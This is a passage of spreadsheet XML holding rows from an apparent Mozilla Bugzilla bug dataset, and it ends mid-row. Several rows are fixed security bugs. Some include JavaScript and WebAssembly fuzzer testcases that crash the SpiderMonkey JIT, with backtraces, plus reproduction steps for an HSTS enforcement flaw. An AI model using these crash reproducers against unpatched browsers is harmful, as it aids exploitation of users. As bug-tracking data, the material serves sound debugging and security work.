      <c r="E5772" t="n">
        <v>1</v>
      </c>
      <c r="F5772" t="n">
        <v>1</v>
      </c>
      <c r="G5772" t="n">
        <v>6</v>
      </c>
      <c r="H5772" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5772" t="inlineStr">
        <is>
          <t>Webtools Graveyard</t>
        </is>
      </c>
      <c r="J5772" t="inlineStr">
        <is>
          <t>Bonsai</t>
        </is>
      </c>
      <c r="K5772" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5772" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5772" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5772" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5772" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5772" t="inlineStr"/>
      <c r="Q5772" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5772" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5772" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5772" t="n">
        <v>1</v>
      </c>
      <c r="U5772" t="n">
        <v>0</v>
      </c>
      <c r="V5772" t="n">
        <v>12</v>
      </c>
      <c r="W5772" t="inlineStr">
        <is>
          <t>as reported at:
http://online.securityfocus.com/archive/1/288163/2002-08-17/2002-08-23/0</t>
        </is>
      </c>
      <c r="X5772" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5773">
      <c r="A5773" t="n">
        <v>1114569</v>
      </c>
      <c r="B5773" t="inlineStr">
        <is>
          <t>2014-12-22 05:06:10 -0800</t>
        </is>
      </c>
      <c r="C5773" t="inlineStr">
        <is>
          <t>Assertion failure: ionRecovery_.empty(), at js/src/vm/Stack.cpp:1415</t>
        </is>
      </c>
      <c r="D5773" t="inlineStr">
        <is>
          <t>2016-06-04 16:12:48 -0700</t>
        </is>
      </c>
      <c r="E5773" t="n">
        <v>1</v>
      </c>
      <c r="F5773" t="n">
        <v>1</v>
      </c>
      <c r="G5773" t="n">
        <v>3</v>
      </c>
      <c r="H5773" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5773" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5773" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5773" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5773" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5773" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5773" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5773" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5773" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main36+]</t>
        </is>
      </c>
      <c r="Q5773" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5773" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5773" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T5773" t="n">
        <v>1</v>
      </c>
      <c r="U5773" t="n">
        <v>0</v>
      </c>
      <c r="V5773" t="n">
        <v>19</v>
      </c>
      <c r="W5773" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 7b33ee7fd162 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-offthread-compile=off --ion-eager):
try {
  setObjectMetadataCallback(true);
  function test() {
    function c()
      $ERROR('#1: 1e+01 === 10');    
    function gen() {}
    c(gen);
  }
  test();
} catch(exc2) {}
test();
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x0000000000adb8c1 in js::jit::JitActivation::~JitActivation (this=0x7fffffffcce0, __in_chrg=&lt;optimized out&gt;) at js/src/vm/Stack.cpp:1415
1415	    MOZ_ASSERT(ionRecovery_.empty());
#0  0x0000000000adb8c1 in js::jit::JitActivation::~JitActivation (this=0x7fffffffcce0, __in_chrg=&lt;optimized out&gt;) at js/src/vm/Stack.cpp:1415
#1  0x000000000073da40 in EnterIon (data=..., cx=0x1a13590) at js/src/jit/Ion.cpp:2450
#2  js::jit::IonCannon (cx=0x1a13590, state=...) at js/src/jit/Ion.cpp:2530
#3  0x0000000000a6f87b in js::RunScript (cx=0x1a13590, state=...) at js/src/vm/Interpreter.cpp:412
#4  0x0000000000a70525 in js::Invoke (cx=0x1a13590, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:501
#5  0x0000000000a7181d in js::Invoke (cx=0x1a13590, thisv=..., fval=..., argc=&lt;optimized out&gt;, argv=0x7fffffffdb08, rval=JSVAL_VOID) at js/src/vm/Interpreter.cpp:538
#6  0x00000000006a86bf in js::jit::DoCallFallback (cx=0x7fffffffdab8, frame=0x7fffffffdb40, stub_=&lt;optimized out&gt;, argc=0, vp=0x7fffffffdaf8, res=JSVAL_VOID) at js/src/jit/BaselineIC.cpp:9435
#7  0x00007ffff7e368fd in ?? ()
[...]
rax	0x0	0
rbx	0x7fffffffcce0	140737488342240
rcx	0x7ffff6cb792d	140737333917997
rdx	0x0	0
rsi	0x7ffff6f8baa0	140737336883872
rdi	0x7ffff6f8a180	140737336877440
rbp	0x7fffffffcc10	140737488342032
rsp	0x7fffffffcbe0	140737488341984
r8	0x7ffff7fe8740	140737354041152
r9	0x72746e65632d616c	8247338199356891500
r10	0x7fffffffc970	140737488341360
r11	0x7ffff6c3fc90	140737333427344
r12	0x7fffffffce90	140737488342672
r13	0x7fffffffd000	140737488343040
r14	0x1b00cc0	28314816
r15	0x1a13598	27342232
rip	0xadb8c1 &lt;js::jit::JitActivation::~JitActivation()+305&gt;
=&gt; 0xadb8c1 &lt;js::jit::JitActivation::~JitActivation()+305&gt;:	movl   $0x7b,0x0
   0xadb8cc &lt;js::jit::JitActivation::~JitActivation()+316&gt;:	callq  0x4049c0 &lt;abort@plt&gt;</t>
        </is>
      </c>
      <c r="X5773" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5774">
      <c r="A5774" t="n">
        <v>463284</v>
      </c>
      <c r="B5774" t="inlineStr">
        <is>
          <t>2008-11-05 13:28:10 -0800</t>
        </is>
      </c>
      <c r="C5774" t="inlineStr">
        <is>
          <t>Tracking bug for Build and Release of TB2.0.0.18</t>
        </is>
      </c>
      <c r="D5774" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5774" t="n">
        <v>1</v>
      </c>
      <c r="F5774" t="n">
        <v>1</v>
      </c>
      <c r="G5774" t="n">
        <v>5</v>
      </c>
      <c r="H5774" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5774" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5774" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5774" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5774" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5774" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5774" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5774" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5774" t="inlineStr"/>
      <c r="Q5774" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5774" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5774" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5774" t="n">
        <v>1</v>
      </c>
      <c r="U5774" t="n">
        <v>0</v>
      </c>
      <c r="V5774" t="n">
        <v>6</v>
      </c>
      <c r="W5774" t="inlineStr">
        <is>
          <t>Still waiting on one change on the relbranch.</t>
        </is>
      </c>
      <c r="X5774" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5775">
      <c r="A5775" t="n">
        <v>1184940</v>
      </c>
      <c r="B5775" t="inlineStr">
        <is>
          <t>2015-07-17 05:57:35 -0700</t>
        </is>
      </c>
      <c r="C5775" t="inlineStr">
        <is>
          <t>Implement the refreshed design for the edit context view</t>
        </is>
      </c>
      <c r="D5775" t="inlineStr">
        <is>
          <t>2015-10-05 06:14:48 -0700</t>
        </is>
      </c>
      <c r="E5775" t="n">
        <v>1</v>
      </c>
      <c r="F5775" t="n">
        <v>1</v>
      </c>
      <c r="G5775" t="n">
        <v>6</v>
      </c>
      <c r="H5775" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5775" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J5775" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K5775" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5775" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5775" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5775" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5775" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5775" t="inlineStr">
        <is>
          <t>[visual refresh][strings]</t>
        </is>
      </c>
      <c r="Q5775" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5775" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5775" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T5775" t="n">
        <v>1</v>
      </c>
      <c r="U5775" t="n">
        <v>0</v>
      </c>
      <c r="V5775" t="n">
        <v>23</v>
      </c>
      <c r="W5775" t="inlineStr">
        <is>
          <t>To meet the acceptance criteria as stated in bug 1179164, we should:
 - Implement the back button, which the replaces the 'Close' (or 'Cancel', 'x') button, but keeps its functionality.
 - Rename the 'Save' button to 'Done'.
 - Add/ implement a 'Cancel' button, which does the exact same thing as the back button.
 - The context view should remain visible below the two 'Done' and 'Cancel' button, which will behave as a preview area that updates when you change a value in the form.
For the visual design spec, please check out the ones attached to bug 1179164.</t>
        </is>
      </c>
      <c r="X5775" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5776">
      <c r="A5776" t="n">
        <v>1704843</v>
      </c>
      <c r="B5776" t="inlineStr">
        <is>
          <t>2021-04-13 09:20:43 -0700</t>
        </is>
      </c>
      <c r="C5776" t="inlineStr">
        <is>
          <t>HSTS includeSubDomains not properly enforced</t>
        </is>
      </c>
      <c r="D5776" t="inlineStr">
        <is>
          <t>2021-11-22 23:45:32 -0800</t>
        </is>
      </c>
      <c r="E5776" t="n">
        <v>1</v>
      </c>
      <c r="F5776" t="n">
        <v>1</v>
      </c>
      <c r="G5776" t="n">
        <v>3</v>
      </c>
      <c r="H5776" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5776" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5776" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K5776" t="inlineStr">
        <is>
          <t>Firefox 87</t>
        </is>
      </c>
      <c r="L5776" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5776" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5776" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5776" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5776" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main90+]</t>
        </is>
      </c>
      <c r="Q5776" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5776" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5776" t="inlineStr">
        <is>
          <t>90 Branch</t>
        </is>
      </c>
      <c r="T5776" t="n">
        <v>1</v>
      </c>
      <c r="U5776" t="n">
        <v>0</v>
      </c>
      <c r="V5776" t="n">
        <v>15</v>
      </c>
      <c r="W5776" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Steps to reproduce:
1. Go to https://tocco.ch/status-tocco
As part of the response, Firefox is informed about a HSTS policy that includes subdomains:
Strict-Transport-Security: max-age=43200;includeSubDomains
2. Visit http://abc.tocco.ch/status-tocco
As result of the HSTS policy received early, the request is made using https but a "Accept the Risk and Continue" is still shown.
Also, clicking on SSL_ERROR_BAD_CERT_DOMAIN reveals that Firefox doesn't think there is a HSTS policy in effect:
https://abc.tocco.ch/status-tocco
Unable to communicate securely with peer: requested domain name does not match the server’s certificate.
HTTP Strict Transport Security: false
HTTP Public Key Pinning: false
Actual results:
"Accept the Risk and Continue" button is shown.
Expected results:
As intended by the Strict-Transport-Security header, there should be no way to add an exception. I also checked Firefox 78 ESR and there the behavior was still correct.</t>
        </is>
      </c>
      <c r="X5776" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5777">
      <c r="A5777" t="n">
        <v>1766806</v>
      </c>
      <c r="B5777" t="inlineStr">
        <is>
          <t>2022-04-28 01:41:05 -0700</t>
        </is>
      </c>
      <c r="C5777" t="inlineStr">
        <is>
          <t>Assertion failure: *def-&gt;output() == alloc, at jit/RegisterAllocator.cpp:270</t>
        </is>
      </c>
      <c r="D5777" t="inlineStr">
        <is>
          <t>2024-05-30 10:55:57 -0700</t>
        </is>
      </c>
      <c r="E5777" t="n">
        <v>1</v>
      </c>
      <c r="F5777" t="n">
        <v>1</v>
      </c>
      <c r="G5777" t="n">
        <v>3</v>
      </c>
      <c r="H5777" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5777" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5777" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K5777" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5777" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5777" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5777" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5777" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5777" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main101+][adv-esr91.10+]</t>
        </is>
      </c>
      <c r="Q5777" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5777" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5777" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T5777" t="n">
        <v>1</v>
      </c>
      <c r="U5777" t="n">
        <v>0</v>
      </c>
      <c r="V5777" t="n">
        <v>19</v>
      </c>
      <c r="W5777" t="inlineStr">
        <is>
          <t>Created attachment 9274191
stack
```js
new WebAssembly.Module(wasmTextToBinary(`
(module
  (global $global$1
    (mut i32)
    (i32.const 0)
  )
  (func $0
    (param $0 f64)
    (param $1 f32)
    (result f32)
    (f32.copysign
      (local.get $1)
      (f32.const 0)
    )
  )
)
`));
```
```
(gdb) bt
#0  js::jit::AllocationIntegrityState::checkIntegrity (this=this@entry=0x7fffffff7800, block=block@entry=0x7ffff5f1cfa0, ins=0x7ffff5f1d158, ins@entry=0x7ffff5f1e020, vreg=vreg@entry=4, alloc=...) at /home/skygentoo/trees/mozilla-central/js/src/jit/RegisterAllocator.cpp:270
#1  0x0000555557be4538 in js::jit::AllocationIntegrityState::check (this=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/jit/RegisterAllocator.cpp:207
#2  0x0000555557a9d11a in js::jit::GenerateLIR (mir=mir@entry=0x7fffffff7b50) at /home/skygentoo/trees/mozilla-central/js/src/jit/Ion.cpp:1534
#3  0x0000555557d41453 in js::wasm::IonCompileFunctions (moduleEnv=..., compilerEnv=..., lifo=..., inputs=..., code=&lt;optimized out&gt;, error=error@entry=0x7fffffffb828) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmIonCompile.cpp:6944
#4  0x0000555557d0cbc3 in ExecuteCompileTask (task=0x7ffff6ace800, error=0x7fffffffb828) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmGenerator.cpp:712
#5  0x0000555557d0d89a in js::wasm::ModuleGenerator::locallyCompileCurrentTask (this=0x7fffffffa2e0) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmGenerator.cpp:773
#6  js::wasm::ModuleGenerator::finishFuncDefs (this=0x7fffffffa2e0) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmGenerator.cpp:913
#7  0x0000555557cea100 in DecodeCodeSection&lt;js::wasm::Decoder&gt; (env=..., d=..., mg=...) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmCompile.cpp:709
#8  0x0000555557ce9de7 in js::wasm::CompileBuffer (args=..., bytecode=..., error=error@entry=0x7fffffffb828, warnings=warnings@entry=0x7fffffffb858, listener=listener@entry=0x0) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmCompile.cpp:731
#9  0x0000555557d5a8c9 in js::WasmModuleObject::construct (cx=cx@entry=0x7ffff6a2c200, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/wasm/WasmJS.cpp:1815
#10 0x0000555556c398d0 in CallJSNative (cx=cx@entry=0x7ffff6a2c200, native=native@entry=0x555557d5a730 &lt;js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*)&gt;, reason=&lt;optimized out&gt;, reason@entry=js::CallReason::Call, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:420
#11 0x0000555556c3dd25 in CallJSNativeConstructor (cx=cx@entry=0x7ffff6a2c200, native=0x555557d5a730 &lt;js::WasmModuleObject::construct(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:436
#12 0x0000555556c2d4db in InternalConstruct (cx=&lt;optimized out&gt;, cx@entry=0x7ffff6a2c200, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:633
#13 0x0000555556c22503 in js::ConstructFromStack (cx=0x7ffff6a2c200, args=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:679
#14 Interpret (cx=cx@entry=0x7ffff6a2c200, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:3304
#15 0x0000555556c18dcf in js::RunScript (cx=cx@entry=0x7ffff6a2c200, state=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:389
#16 0x0000555556c2e4a4 in js::ExecuteKernel (cx=cx@entry=0x7ffff6a2c200, script=script@entry=..., envChainArg=envChainArg@entry=..., evalInFrame=evalInFrame@entry=..., result=result@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:781
#17 0x0000555556c2e87c in js::Execute (cx=cx@entry=0x7ffff6a2c200, script=..., envChain=..., rval=..., rval@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/Interpreter.cpp:813
#18 0x0000555556d93daf in ExecuteScript (cx=cx@entry=0x7ffff6a2c200, envChain=..., script=..., rval=rval@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/CompilationAndEvaluation.cpp:509
#19 0x0000555556d93fd8 in JS_ExecuteScript (cx=cx@entry=0x7ffff6a2c200, scriptArg=scriptArg@entry=...) at /home/skygentoo/trees/mozilla-central/js/src/vm/CompilationAndEvaluation.cpp:533
#20 0x0000555556b5e7a1 in RunFile (cx=cx@entry=0x7ffff6a2c200, filename=0x7fffffffde82 "testcase.js", filename@entry=0x7ffff7864020 "\230$\255\373\344\344\344", &lt;incomplete sequence \344&gt;, file=&lt;optimized out&gt;, file@entry=0x7ffff7864020, compileMethod=compileMethod@entry=CompileUtf8::DontInflate, compileOnly=false) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:1065
#21 0x0000555556b5ded2 in Process (cx=cx@entry=0x7ffff6a2c200, filename=&lt;optimized out&gt;, forceTTY=false, kind=kind@entry=FileScript) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:1654
#22 0x0000555556b2443c in ProcessArgs (cx=0x7ffff6a2c200, op=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:10921
#23 Shell (cx=0x7ffff6a2c200, op=op@entry=0x7fffffffd6e8) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:11660
#24 0x0000555556b1d81a in main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;) at /home/skygentoo/trees/mozilla-central/js/src/shell/js.cpp:12702
(gdb)
```
Run with `--fuzzing-safe --no-threads --no-baseline --no-ion testcase.js`, compile with `AR=ar sh ./configure --enable-simulator=arm64 --enable-debug --with-ccache --enable-gczeal --enable-debug-symbols --disable-bootstrap --disable-tests`, tested on m-c rev 79a65e971e59.
Not sure if this is s-s, I'd leave it to Julian/Lars. Bisecting now...</t>
        </is>
      </c>
      <c r="X5777" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5778">
      <c r="A5778" t="n">
        <v>1212305</v>
      </c>
      <c r="B5778" t="inlineStr">
        <is>
          <t>2015-10-07 05:38:15 -0700</t>
        </is>
      </c>
      <c r="C5778" t="inlineStr">
        <is>
          <t>Assertion failure: calleeScript-&gt;hasBaselineScript(), at js/src/jit/Ion.cpp:619</t>
        </is>
      </c>
      <c r="D5778" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:13 -0700</t>
        </is>
      </c>
      <c r="E5778" t="n">
        <v>1</v>
      </c>
      <c r="F5778" t="n">
        <v>1</v>
      </c>
      <c r="G5778" t="n">
        <v>3</v>
      </c>
      <c r="H5778" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5778" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5778" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5778" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5778" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5778" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5778" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5778" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5778" t="inlineStr">
        <is>
          <t>[jsbugmon:ignore][b2g-adv-main2.5+][adv-main43+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5778" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5778" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5778" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T5778" t="n">
        <v>1</v>
      </c>
      <c r="U5778" t="n">
        <v>0</v>
      </c>
      <c r="V5778" t="n">
        <v>10</v>
      </c>
      <c r="W5778" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 67adec79eb8a (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-shared-stubs=on):
(No proper testcase available, filing on behalf of h4writer).
Backtrace:
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x00000000009b2c0a in js::jit::LazyLink (cx=cx@entry=0x7fce97806c00, calleeScript=..., calleeScript@entry=...) at js/src/jit/Ion.cpp:619
#1  0x00000000009b46f1 in js::jit::CanEnter (cx=cx@entry=0x7fce97806c00, state=...) at js/src/jit/Ion.cpp:2573
#2  0x0000000000705f1d in js::RunScript (cx=cx@entry=0x7fce97806c00, state=...) at js/src/vm/Interpreter.cpp:685
#3  0x000000000070674f in js::Invoke (cx=cx@entry=0x7fce97806c00, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:786
#4  0x00000000007072bd in js::Invoke (cx=cx@entry=0x7fce97806c00, thisv=..., fval=..., argc=argc@entry=1, argv=argv@entry=0x7fff0cdc7770, rval=..., rval@entry=...) at js/src/vm/Interpreter.cpp:823
#5  0x00000000008d687b in js::jit::DoCallFallback (cx=0x7fce97806c00, frame=0x7fff0cdc77c8, stub_=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=0x7fff0cdc7760, res=...) at js/src/jit/BaselineIC.cpp:8905
#6  0x00007fce98d87f9f in ?? ()
#33 0x0000000000000000 in ?? ()
rax	0x0	0
rbx	0x7fce97806c00	140525281766400
rcx	0x7fce97bd688d	140525285763213
rdx	0x0	0
rsi	0x7fce97eab9d0	140525288733136
rdi	0x7fce97eaa1c0	140525288726976
rbp	0x7fff0cdc6f80	140733409161088
rsp	0x7fff0cdc6d90	140733409160592
r8	0x7fce98f1b780	140525305968512
r9	0x6372732f736a2f6c	7165916604736876396
r10	0x7fce97ea7be0	140525288717280
r11	0x0	0
r12	0x7fce95920258	140525249364568
r13	0x7fff0cdc6ed0	140733409160912
r14	0x7fff0cdc6e20	140733409160736
r15	0x7fff0cdc6e38	140733409160760
rip	0x9b2c0a &lt;js::jit::LazyLink(JSContext*, JS::Handle&lt;JSScript*&gt;)+1514&gt;
=&gt; 0x9b2c0a &lt;js::jit::LazyLink(JSContext*, JS::Handle&lt;JSScript*&gt;)+1514&gt;:	movl   $0x26b,0x0
   0x9b2c15 &lt;js::jit::LazyLink(JSContext*, JS::Handle&lt;JSScript*&gt;)+1525&gt;:	callq  0x4979a0 &lt;abort()&gt;</t>
        </is>
      </c>
      <c r="X5778" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5779">
      <c r="A5779" t="n">
        <v>396321</v>
      </c>
      <c r="B5779" t="inlineStr">
        <is>
          <t>2007-09-15 21:27:52 -0700</t>
        </is>
      </c>
      <c r="C5779" t="inlineStr">
        <is>
          <t>"ASSERTION: Couldn't find glyph for trailing marker" with &lt;svg:text&gt;, RLE</t>
        </is>
      </c>
      <c r="D5779" t="inlineStr">
        <is>
          <t>2008-03-26 19:40:57 -0700</t>
        </is>
      </c>
      <c r="E5779" t="n">
        <v>1</v>
      </c>
      <c r="F5779" t="n">
        <v>1</v>
      </c>
      <c r="G5779" t="n">
        <v>3</v>
      </c>
      <c r="H5779" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5779" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5779" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K5779" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5779" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5779" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5779" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5779" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5779" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5779" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5779" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5779" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5779" t="n">
        <v>1</v>
      </c>
      <c r="U5779" t="n">
        <v>0</v>
      </c>
      <c r="V5779" t="n">
        <v>10</v>
      </c>
      <c r="W5779" t="inlineStr">
        <is>
          <t>Created attachment 281062
testcase
Loading the testcase triggers this assertion, at least the first time it's loaded in a session:
###!!! ASSERTION: Couldn't find glyph for trailing marker: 'glyphRecords[numGlyphs - 1].originalOffset == aSegmentLength*2', file /Users/jruderman/trunk/mozilla/gfx/thebes/src/gfxAtsuiFonts.cpp, line 865
With a testcase more complicated than the one I'm attaching, this leads to a crash that looks exploitable.
I'm testing with the patch from bug 395458 comment 3.</t>
        </is>
      </c>
      <c r="X5779" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5780">
      <c r="A5780" t="n">
        <v>155700</v>
      </c>
      <c r="B5780" t="inlineStr">
        <is>
          <t>2002-07-03 17:59:04 -0700</t>
        </is>
      </c>
      <c r="C5780" t="inlineStr">
        <is>
          <t>taint error in SendSQL when called from ValidateBugID</t>
        </is>
      </c>
      <c r="D5780" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:31 -0800</t>
        </is>
      </c>
      <c r="E5780" t="n">
        <v>1</v>
      </c>
      <c r="F5780" t="n">
        <v>1</v>
      </c>
      <c r="G5780" t="n">
        <v>4</v>
      </c>
      <c r="H5780" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5780" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5780" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5780" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
